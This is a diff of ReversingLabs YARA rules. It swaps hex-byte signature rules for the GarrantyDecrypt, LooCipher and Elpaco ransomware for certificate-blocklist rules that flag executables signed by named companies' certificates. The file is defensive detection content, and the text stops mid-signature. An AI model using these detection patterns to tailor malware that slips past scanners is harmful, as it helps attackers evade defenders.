+rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GarrantyDecrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0aa05f06-1773-5ce8-892d-04468f5deccc"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "d679238f-a697-5322-815c-9986c9d24032"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.GarrantyDecrypt.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7194c1e0e15a89f2c691a7d586b9db68295cc52a5f042d0f7eb558c326430444"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11236-L11252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40b570b28e10ebd2a1ba515dc3fa45bdb5c0b76044e4dda7a6819976072a67a2"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GarrantyDecrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 8D 45 ?? 50 89 5D ?? FF D6 85 C0 75
-            ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 45 ?? 50 FF D6 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ??
-            3B C3 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 3B F3 0F 84 ?? ?? ?? ?? 8B 7E ?? 8B 46
-            ?? 33 C9 3B FB 76 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 29 45 ?? 8B 55 ?? 8D 84 0D ?? ?? ??
-            ?? 8A 14 02 41 88 10 3B CF 72 ?? 68 ?? ?? ?? ?? 53 53 FF 76 ?? FF 36 FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 3B FB 74 ?? 8B 46 ?? 68 ?? ?? ?? ?? 89 45
-            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 53 6A ?? 53 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B
-            45 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 36 E8
-            ?? ?? ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 53 FF
-            35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8D 45 ?? 50 6A ?? 5F 57 FF 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 58 E8 ?? ?? ?? ?? 8B C8 33 DB 89 4D ?? 3B
-            CB 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 7D ?? 8B F1 2B C1 8A 14 30 88 16 46 4F 75 ?? 6A ??
-            8D 45 ?? 50 51 53 6A ?? 53 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 53 68 ?? ??
-            ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 89 5D ?? 89 5D ?? 8B 3D ?? ?? ?? ?? 56 FF D7 8D 04 46 83 E8 ?? 66 83 38 ??
-            75 ?? 8B 4D ?? FF B1 ?? ?? ?? ?? 2B C6 83 C0 ?? D1 F8 8D 04 46 50 FF 15 ?? ?? ?? ??
-            3B C3 74 ?? 50 FF D7 8B 4D ?? FF B1 ?? ?? ?? ?? 89 45 ?? FF D7 39 45 ?? 74 ?? 83 45
-            ?? ?? 83 7D ?? ?? 72 ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            3D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 45 ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
-            ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 33 C0 89 5D ?? 3B
-            C3 72 ?? 77 ?? 39 5D ?? 76 ?? 8B 45 ?? 8B C8 81 E1 ?? ?? ?? ?? 79 ?? 49 83 C9 ?? 41
-            89 4D ?? 75 ?? 99 83 E2 ?? 03 C2 C1 F8 ?? 99 52 50 8D 85 ?? ?? ?? ?? 50 8D 45 ?? E8
-            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 8B 55 ?? 8B 45 ?? 8A 8C 0D ?? ?? ?? ?? 30 0C 10 FF 45
-            ?? 8B 45 ?? 99 33 C9 3B D1 72 ?? 77 ?? 3B 45 ?? 72 ?? 8B 45 ?? 6A ?? F7 D8 99 53 52
-            50 FF 75 ?? FF D7 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? FF 75 ?? FF D6 39 5D ?? 74 ?? 81
-            7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50
-            FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D7 53 8D 45 ?? 50 6A ?? 8D 45 ?? 50 FF 75 ?? FF D6
-            53 8D 45 ?? 50 6A ?? FF 75 ?? FF 75 ?? FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B F0 3B F3 74 ?? 68 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
-            59 FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? 85
-            DB 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53
-            FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? BB ?? ?? ?? ?? 83 65 ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 72 ?? 8D 85 ?? ??
-            ?? ?? 50 FF 75 ?? 53 57 FF 75 ?? FF D6 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? E8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? FF 75
-            ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 53 57 FF 75 ?? FF D6 83
-            C4 ?? 33 F6 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 74 ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 BF ?? ?? ?? ?? 57 FF D6 50
-            57 8B 3D ?? ?? ?? ?? 53 FF D7 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? FF D6 50 FF 35 ??
-            ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DILA d.o.o." and pe.signatures [ i ] . serial == "02:b6:65:62:92:31:0b:84:02:2d:b5:54:1b:c4:8f:af" and 1613865600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_64C2505C7306639Fc8Eae544B0305338 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "b0e4057f-a0e7-5e2e-a47f-dc8188b6b506"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11254-L11270"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9b6fb002d603135391958668be0ef805e441928a035c9c4da4bb9915aa3086e8"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MANILA Solution as" and pe.signatures [ i ] . serial == "64:c2:50:5c:73:06:63:9f:c8:ea:e5:44:b0:30:53:38" and 1609418043 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_2F96A89Bfec6E44Dd224E8Fd7E72D9Bb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LooCipher ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "bdca8435-c1fd-598d-bd82-20a3a3b2a959"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11272-L11288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c0c8e5c0e2e120ee6b055e9a6b2af3d424bed0832c2619beab658fe01757f69f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LooCipher"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
-            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8
-        }
-		$encrypt_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D
-            45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74
-            ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89
-            55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ??
-            E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89
-            A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC
-            89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52
-            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and pe.signatures [ i ] . serial == "2f:96:a8:9b:fe:c6:e4:4d:d2:24:e8:fd:7e:72:d9:bb" and 1625529600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_B649A966410F62999C939384Af553919 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "03533c22-eb16-546c-af55-675af9c833ce"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11290-L11308"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "623a2f931198eacf44fd233065e96a4dcadb5b3bbc7ca56df2b6ae9eafc4faa5"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and ( pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" or pe.signatures [ i ] . serial == "b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" ) and 1590537600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Elpaco : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_45245Eef53Fcf38169C715Cf68F44452 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Elpaco ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb3a6293-f10c-55c4-960a-339e1e7922fe"
-		date = "2025-02-27"
-		modified = "2025-02-27"
+		id = "514eac5a-9264-58ef-b4ee-65ec24b43e5a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Elpaco.yara#L1-L316"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b3fdd586c9f3e5c40782c814b5091b28e88f3d74032c392a6479182eb74327a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11310-L11326"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7e0c3147e657802e457f6df271b7f5a64c81fd13f936a8935aa991022e4ab238"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Elpaco"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ??
-            ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 6A ?? 66 0F 13 45 ?? 6A ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 6A
-            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ??
-            ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 7E ?? 8D 85 ?? ?? ?? ?? 50 57 56 E8 ?? ?? ?? ?? 8B 55 ??
-            B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 5D ?? 83 C2 ?? 89 46 ?? 89 55 ??
-            89 07 0F 84 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B F2 8B 03 8D 4D ?? 8B 40 ?? 50 89 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? B8 ?? ?? ?? ?? 47 C6 45 ?? ?? F7 E7 8B
-            CF 89 BD ?? ?? ?? ?? C1 EA ?? 6B C2 ?? 2B C8 75 ?? 57 39 8D ?? ?? ?? ?? 75 ?? 68 ??
-            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ??
-            8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B BD ?? ?? ?? ?? 0F 43 4D ?? 50 51 68
-            ?? ?? ?? ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 BF ?? ?? ?? ?? ?? 75 ?? 83
-        }
-		$find_files_p2 = {
-            7D ?? ?? 8D 4D ?? 0F 43 4D ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 8D ?? ?? ??
-            ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ??
-            ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 74 ?? 8B 4F ?? 83 F9 ?? 72 ?? 8B 07 8D 0C 4D ?? ??
-            ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? 6A ?? C7 47 ??
-            ?? ?? ?? ?? 57 66 89 07 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 4E 6A ?? 52 89 75 ?? 8B 4A ??
-            8B 02 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? A9 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 85 ?? ??
-            ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4 89 A5 ?? ?? ?? ?? 33
-            C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 0F 1F 80 ?? ?? ?? ??
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
-            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8B 3D ?? ?? ?? ?? 8D 5D
-            ?? 83 7D ?? ?? 0F 43 5D ?? 8B 37 3B F7 74 ?? 83 7E ?? ?? 8D 46 ?? 72 ?? 8B 00 50 53
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 36 3B F7 75 ?? 8B 9D ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ??
